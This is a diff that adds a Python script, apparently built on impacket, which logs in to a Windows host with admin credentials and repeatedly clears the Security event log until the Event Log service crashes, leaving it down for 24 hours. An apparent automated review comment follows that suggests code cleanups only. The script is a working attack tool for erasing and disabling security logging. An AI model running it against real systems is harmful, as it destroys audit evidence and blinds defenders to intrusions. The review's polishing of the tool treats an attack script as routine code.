@@ -0,0 +1,49 @@ |
|
|
# Crash the Windows Event Log Service remotely, needs Admin privs |
|
|
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r |
|
|
# |
|
|
# Once the service crashes 3 times it will not restart for 24 hours |
|
|
# |
|
|
# https://github.com/limbenjamin/LogServiceCrash |
|
|
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html |
|
|
# |
|
|
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket) |
|
|
|
|
|
from impacket.dcerpc.v5 import transport, even |
|
|
from impacket.smbconnection import SMBConnection, SessionError |
|
|
from impacket.smb import SMB_DIALECT |
|
|
from impacket.dcerpc.v5.dtypes import NULL |
|
|
|
|
|
host = "target_ip" |
|
|
username = "Administrator" |
|
|
password = "password" |
|
|
|
|
|
while True: |
|
|
# We're using an SMBv1 connection so you can see the un-encrypted traffic if you so desire |
|
|
conn = SMBConnection(host, host, None, 445, preferredDialect=SMB_DIALECT) |
|
|
conn.login(username, password) |
|
|
|
|
|
rpctransport = transport.SMBTransport(host, host, filename='/eventlog', smb_connection=conn) |
|
|
|
|
|
try: |
|
|
dce = rpctransport.get_dce_rpc() |
|
|
dce.connect() |
|
|
dce.bind(even.MSRPC_UUID_EVEN, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')) |
|
|
except SessionError: |
|
|
print("Event log go boom!") |
|
|
break |
|
|
|
|
|
try: |
|
|
|
|
|
resp = even.hElfrOpenELW(dce, 'Security', '') |
|
|
resp.dump() |
|
|
|
|
|
# Calling ElfrClearELFW with a handle from ElfrOpenELW and specifying NULL as the BackupFileName seems to be what triggers the bug |
|
|
resp = even.hElfrClearELFW( |
|
|
dce, |
|
|
resp['LogHandle'], |
|
|
NULL |
|
|
) |
|
|
|
|
|
resp.dump() |
|
|
except SessionError: |
|
|
pass |
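Review bot: The SMB session opened at the top of each iteration (`conn = SMBConnection(host, host, None, 445, preferredDialect=SMB_DIALECT)` followed by `conn.login(username, password)`) is never closed, neither on the `break` path after the first `except SessionError` nor at the end of a normal iteration, so every pass through `while True` leaves a logged-in session and its DCE/RPC binding behind. The second `except SessionError: pass` also swallows any failure of `hElfrOpenELW` or `hElfrClearELFW` without output, so when the clear fails the loop simply reconnects with no indication of why. Wrapping the per-iteration work in `try: ... finally: conn.close()` releases the session on both paths, and the `pass` deserves a comment stating the intended behaviour, e.g. `# open/clear failed on this session; fall through and reconnect on the next pass`. The hard-coded `host`, `username` and `password` literals at the top of the file would also be clearer as named constants documented in the header comment alongside the existing "needs Admin privs" note.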